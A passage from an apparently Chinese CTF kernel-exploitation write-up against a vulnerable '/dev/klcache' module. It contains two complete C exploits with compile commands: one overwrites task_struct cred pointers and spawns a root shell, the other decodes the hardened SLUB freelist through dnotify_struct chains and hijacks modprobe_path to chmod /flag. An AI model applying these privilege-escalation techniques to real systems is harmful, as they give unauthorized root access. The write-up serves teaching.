    for (curr_page = orig_buf[0]+0x4000ULL*0x40ULL; curr_page >= orig_buf[0]-0x10000ULL*0x40ULL; ++scanned, curr_page -= 0x40) {
        if (scanned % 100 == 0) {
            printf("[\x1b[34;1m*\x1b[0m] Pages scanned: %d\n", scanned);
        }
        arb_read((void*)curr_page, 0, &arb_read_buf, 0xffe);

        char *hit = memmem(arb_read_buf, 0xffe, "astra_kernel", 12);
        if (!hit) {
            continue;
        }
        /* real_cred and cred are read 24 and 16 bytes before comm. Skip hits
         * too close to the buffer start (would index before arb_read_buf) and
         * hits that are not word-aligned (comm sits at offset 2920 in
         * task_struct, so a real one is 8-byte aligned). */
        size_t hit_off = (size_t)(hit - (char *)arb_read_buf);
        if (hit_off < 3 * sizeof(size_t) || hit_off % sizeof(size_t) != 0) {
            continue;
        }
        size_t *candidate = &arb_read_buf[hit_off / sizeof(size_t)];
        if (candidate[-2] > PAGE_OFFSET_BASE_0 && candidate[-3] > PAGE_OFFSET_BASE_0) {
            task_comm = candidate;
            break;
        }
    }
    if (!task_comm) {
        err_exit("Exhausted 4.", 0);
    }

    printf("[\x1b[32;1m+\x1b[0m] task_struct on page 0x%016lx\n", curr_page);

    /* Patch the local copy of the page and write it back. */
    task_comm[-2] = task_comm[-3] = INIT_CRED_OFFSET + kernel_base;

    arb_write((void*)curr_page, 0, arb_read_buf, 0xffe);

    printf("[\x1b[34;1m*\x1b[0m] uid: %d\n", getuid());
    printf("[\x1b[34;1m*\x1b[0m] Getting shell...\n");
    system("/bin/sh");

    return 0;
}

编译:

musl-gcc -no-pie -z now -o exp_heapspray exp_heapspray.c -masm=intel -static


上述方法依赖于cross cache,后续对其他结构体的利用均可以归到此类。

然而,就如本文一开始说的那样,my_struct不一定会与其他所有内存池隔离开来。

为方便调试,关闭kaslr,以root身份启动shell,获取内核模块的.bss基址,根据偏移定位cache变量,查看cache->name,可以发现这个内存池的名字并不是my_struct而是dnotify_struct。

/ $ grep -r "" /sys/module/k1cache/sections/
...
/sys/module/k1cache/sections/.bss:0xffffffffc0203840
...

这意味着my_struct成为了dnotify_struct的别名(alias)。

因此,即便不使用cross cache的技巧,我们也可以轻易地劫持struct dnotify_struct结构体。struct dnotify_struct的定义如下。

struct dnotify_struct {
        struct dnotify_struct *    dn_next;              /*     0     8 */
        __u32                      dn_mask;              /*     8     4 */
        int                        dn_fd;                /*    12     4 */
        struct file *              dn_filp;              /*    16     8 */
        fl_owner_t                 dn_owner;             /*    24     8 */

        /* size: 32, cachelines: 1, members: 5 */
        /* last cacheline: 32 bytes */
};

dnotify是一种过时的目录事件监听机制(现代化的替代方案为inotify),通过信号(SIGIO)和文件描述符通知应用程序目录内文件的修改事件(如创建、删除)。dnotify的事件队列机制在我们后续的利用中起到了重要的作用。内存池dnotify_struct_cache用来统一管理struct dnotify_struct。

static int __init dnotify_init(void)
{
    dnotify_struct_cache = KMEM_CACHE(dnotify_struct,
                      SLAB_PANIC|SLAB_ACCOUNT);
    dnotify_mark_cache = KMEM_CACHE(dnotify_mark, SLAB_PANIC|SLAB_ACCOUNT);

    dnotify_group = fsnotify_alloc_group(&dnotify_fsnotify_ops,
                         FSNOTIFY_GROUP_NOFS);
    if (IS_ERR(dnotify_group))
        panic("unable to allocate fsnotify group for dnotify\n");
    dnotify_sysctl_init();
    return 0;
}

module_init(dnotify_init)

观察fcntl_dirnotify函数的逻辑,不难发现,如果我们想要分配一个struct dnotify_struct,将其挂在链表dn_mark上又不提前触发dnotify_flush,参数arg需要满足(arg & ~DN_MULTISHOT) != 0。

void dnotify_flush(struct file *filp, fl_owner_t id)
{
    // ...

    prev = &dn_mark->dn;
    while ((dn = *prev) != NULL) {
        if ((dn->dn_owner == id) && (dn->dn_filp == filp)) {
            *prev = dn->dn_next;
            kmem_cache_free(dnotify_struct_cache, dn);
            dnotify_recalc_inode_mask(fsn_mark);
            break;
        }
        prev = &dn->dn_next;
    }
    
    // ...
}

static int attach_dn(struct dnotify_struct *dn, struct dnotify_mark *dn_mark,
        fl_owner_t id, int fd, struct file *filp, __u32 mask)
{   
    // ...

    dn->dn_mask = mask;
    dn->dn_fd = fd;
    dn->dn_filp = filp;
    dn->dn_owner = id;
    dn->dn_next = dn_mark->dn;
    dn_mark->dn = dn;

    return 0;
}

int fcntl_dirnotify(int fd, struct file *filp, unsigned long arg)
{
    struct dnotify_struct *dn;

    // ...

    /* a 0 mask means we are explicitly removing the watch */
    if ((arg & ~DN_MULTISHOT) == 0) {
        dnotify_flush(filp, id);
        error = 0;
        goto out_err;
    }

    // ...

    /* expect most fcntl to add new rather than augment old */
    dn = kmem_cache_alloc(dnotify_struct_cache, GFP_KERNEL);
    if (!dn) {
        error = -ENOMEM;
        goto out_err;
    }

    // ...

    error = attach_dn(dn, dn_mark, id, fd, filp, mask);

    // ...

    return error;
}

由于内核配置CONFIG_SLAB_FREELIST_HARDENED默认开启,对象上freelist的指针总是被加密保护的。

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
        unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
// ...
return (void *)((unsigned long)ptr ^ s->random ^
   swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

其中swab用来反转一个64位整型的字节端序,而在没有启用硬件辅助的KASAN时kasan_reset_tag相当于空操作。这种加密保护增添了直接篡改freelist指针的难度。

然而,利用struct dnotify_struct的链表结构,如果存在形如A -> B -> C、由dn_next链接、同时位于freelist上的一条链,并且A、B、C可以通过show与delete控制,那么我们便可以先读出B、C的地址,然后通过B的freelist指针计算出cache->random,用double free劫持freelist完成任意写,最后改写modprobe_path就行了。


FINAL EXPLOIT

注:内核基址的泄露使用cross cache与struct seq_operations完成。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <unistd.h>  
#include <signal.h> 

#define CMD_ADD    119
#define CMD_DEL    48
#define CMD_SHOW   64

struct add_args // sizeof=0x10
{
    uint64_t size;
    char *buf;
};
struct del_args // sizeof=0x8
{
    uint64_t idx;
};
struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;
    char *buf;
};

/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
    // cpu_set_t cpu_set;

    // CPU_ZERO(&cpu_set);
    // CPU_SET(core, &cpu_set);
    // sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }

#define OBJ_SPRAY_NR 4000
#define NR_STAT 128

#define OBJECT_SIZE 32

#define MODPROBE_PATH 0xffffffff831d8ce0

int dev_fd;

#define ANON_PIPE_OPS_OFFSET 0xffffffff82246ec0ULL
#define KERNEL_BASE_0 0xffffffff81000000ULL
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
size_t page_leak;

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

struct seq_file;

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

/**
 * Print a red "FATAL"-tagged message and terminate.
 *
 * @param msg        text appended after the tag
 * @param use_errno  non-zero: report through perror() so the errno text of the
 *                   failing call is appended; zero: print the message alone
 *
 * Never returns; exits with EXIT_FAILURE.
 */
void err_exit(char *msg, int use_errno)
{
    /* Capture errno first: the formatting below may overwrite it before
     * perror() gets to read it. */
    int saved_errno = errno;
    char buf[0x600] = {0,};

    /* Bounded formatting: an over-long msg is truncated instead of
     * overflowing the stack buffer. */
    snprintf(buf, sizeof(buf), "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) {
        errno = saved_errno;
        perror(buf);
    } else {
        puts(buf);
    }
    exit(EXIT_FAILURE);
}

int dev_add(void* buf) {
    struct add_args req = { 0x20, buf };
    return ioctl(dev_fd, CMD_ADD, &req);
}

int dev_delete(int index) {
    struct del_args req = { index };
    return ioctl(dev_fd, CMD_DEL, &req);
}

int dev_show(int index, void* buf) {
    struct show_args req = { index, 0x20, buf };
    return ioctl(dev_fd, CMD_SHOW, &req);
}

void dump(void *buf) {
    size_t *bufz = (size_t *)buf;
    for (unsigned int i=0; i<(OBJECT_SIZE+7)>>3; ++i) {
        char ascii[9];
        for (int j=0; j<8; ++j) {
            uint8_t ch = (uint8_t)(bufz[i] >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", i << 3, bufz[i], ascii);
    }
    printf("\n");
}

/**
 * Read the 32-byte object stored at driver slot idx and hex-dump it.
 *
 * @param idx  slot index passed to the driver's show ioctl
 * @return     the ioctl status returned by dev_show()
 *
 * The buffer is zero-initialised so that a failed ioctl dumps zeros instead of
 * leftover stack contents, and it is declared as size_t words because dump()
 * reads it word by word.
 */
long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%zu\x1b[0m\n", idx);
#endif
    size_t buf[OBJECT_SIZE / sizeof(size_t)] = {0};
    long status = dev_show(idx, buf);
    dump(buf);
    return status;
}

int dir_fd_1 = -1;
int dir_fd_2 = -1;
int dir_fd_3 = -1;

typedef void * fl_owner_t;
typedef unsigned int __u32;
struct dnotify_struct {
        struct dnotify_struct *    dn_next;              /*     0     8 */
        __u32                      dn_mask;              /*     8     4 */
        int                        dn_fd;                /*    12     4 */
        struct file *              dn_filp;              /*    16     8 */
        fl_owner_t                 dn_owner;             /*    24     8 */

        /* size: 32, cachelines: 1, members: 5 */
        /* last cacheline: 32 bytes */
};

/**
 * Reverse the byte order of a 64-bit value, mirroring the kernel's swab()
 * on a 64-bit word.
 *
 * Uses shifts on the value rather than walking its bytes in memory, so the
 * result does not depend on the byte order of the machine running the
 * exploit.
 *
 * @param n  value to swap
 * @return   n with its eight bytes in reverse order
 */
uint64_t swab64(uint64_t n) {
    uint64_t res = 0;
    for (int i = 0; i < 8; ++i) {
        /* Peel off the lowest byte of n and push it onto the low end of res. */
        res = (res << 8) | (n & 0xffu);
        n >>= 8;
    }
    return res;
}

size_t rnd;
int idx = 0;

int main(){

    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("error opening /dev/klcache", 1);
    }
    
    int victim_fd;
    if ((victim_fd = open("/tmp/victim", O_CREAT | O_RDWR, 0777)) < 0) {
        err_exit("victim", 1);
    }
    
    char cmd[] = "#!/bin/sh\nchmod 777 /flag\n";
    if (write(victim_fd, cmd, strlen(cmd)) < 0) {
        err_exit("write", 1);
    }
    
    close(victim_fd);
    
    struct dnotify_struct buf;
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        dev_add(&buf);
    }
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        dev_delete(i);
    }
    
    int stat_fd[NR_STAT];
    for (int i=0; i<NR_STAT; ++i) {
        if ((stat_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            err_exit("stat", 1);
        }
    }
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        size_t tmpbuf[4];
        dev_show(i, &tmpbuf);
        if (tmpbuf[0] > KERNEL_BASE_0) {
            kernel_base = tmpbuf[0] - (0xffffffff81479670ULL - KERNEL_BASE_0);
            goto out;
        }
    }
    
    for (int i=0; i<NR_STAT; ++i) {
        close(stat_fd[i]);
    }
    
    err_exit("Exhausted.", 0);

out:
    
    printf("[\x1b[32;1m+\x1b[0m] Kernel Base: 0x%016lx\n", kernel_base);
    
    close(dev_fd);
    
    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("error opening /dev/klcache", 1);
    }
    
    dev_add(&buf);
    dev_add(&buf);
    dev_add(&buf);
    
    dev_delete(0);
    dev_delete(1);
    dev_delete(2);
    
    if ((dir_fd_1 = open("/tmp", O_RDONLY)) < 0) err_exit("1st open", 1);
    if (fcntl(dir_fd_1, F_NOTIFY, DN_MODIFY) < 0) err_exit("1st fcntl", 1);
    
    if ((dir_fd_2 = open("/tmp", O_RDONLY)) < 0) err_exit("2nd open", 1);
    if (fcntl(dir_fd_2, F_NOTIFY, DN_MODIFY) < 0) err_exit("2nd fcntl", 1);
    
    if ((dir_fd_3 = open("/tmp", O_RDONLY)) < 0) err_exit("3rd open", 1);
    if (fcntl(dir_fd_3, F_NOTIFY, DN_MODIFY) < 0) err_exit("3rd fcntl", 1);
    
    size_t orig_buf_0[4];
    size_t orig_buf_1[4];
    size_t orig_buf_2[4];
    dev_show(0, &orig_buf_0);
    dev_show(1, &orig_buf_1);
    dev_show(2, &orig_buf_2);
    
    dev_delete(2);
    dev_delete(1);
    dev_delete(0);
    
    show_and_dump(0);
    show_and_dump(1);
    show_and_dump(2);
    
    size_t buf0[4];
    size_t buf1[4];
    size_t buf2[4];
    dev_show(0, &buf0);
    dev_show(1, &buf1);
    dev_show(2, &buf2);
    
    printf("[\x1b[34;1m*\x1b[0m] swab64(0x%016lx) = 0x%016lx\n", 0x1145141919, swab64(0x1145141919));
    
    rnd = swab64(buf0[0]+16) ^ buf1[0] ^ buf1[2];
    printf("[\x1b[32;1m+\x1b[0m] rnd = 0x%016lx\n", rnd);
    
    printf("[\x1b[32;1m+\x1b[0m] buf1.next = 0x%016lx\n", rnd ^ swab64(buf1[0]+16) ^ buf2[2]);
    
    dev_delete(1);
    
    size_t buf3[4];
    size_t modprobe_path = kernel_base + (MODPROBE_PATH - KERNEL_BASE_0);
    buf3[2] = rnd ^ swab64(buf0[0]+16) ^ modprobe_path;
    
    dev_add(&buf3);
    dev_add(&buf);
    dev_add(&buf);
    
    char buf6[32];
    strcpy(buf6, "/tmp/victim");
    
    dev_add(&buf6);
    
    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
    system("chmod +x /tmp/fake");
    system("/tmp/fake");
    
    printf("[\x1b[34;1m*\x1b[0m] Granting read permission for /flag.\n");

    return 0;
}

编译:

musl-gcc -no-pie -z now -o exp_dnotify exp_dnotify.c -masm=intel -static





  1. https://github.com/torvalds/linux/blob/v6.4/include/linux/slab.h
  2. https://github.com/torvalds/linux/blob/v6.4/include/linux/gfp_types.h
  3. https://github.com/torvalds/linux/blob/v6.4/mm/slub.c
  4. https://github.com/torvalds/linux/blob/v6.4/fs/pipe.c
















Tags: #BinaryExploitation, #KernelExploitation, #CrossCache, #HeapSpray, #UAF

Time: 2025-08-15 15:07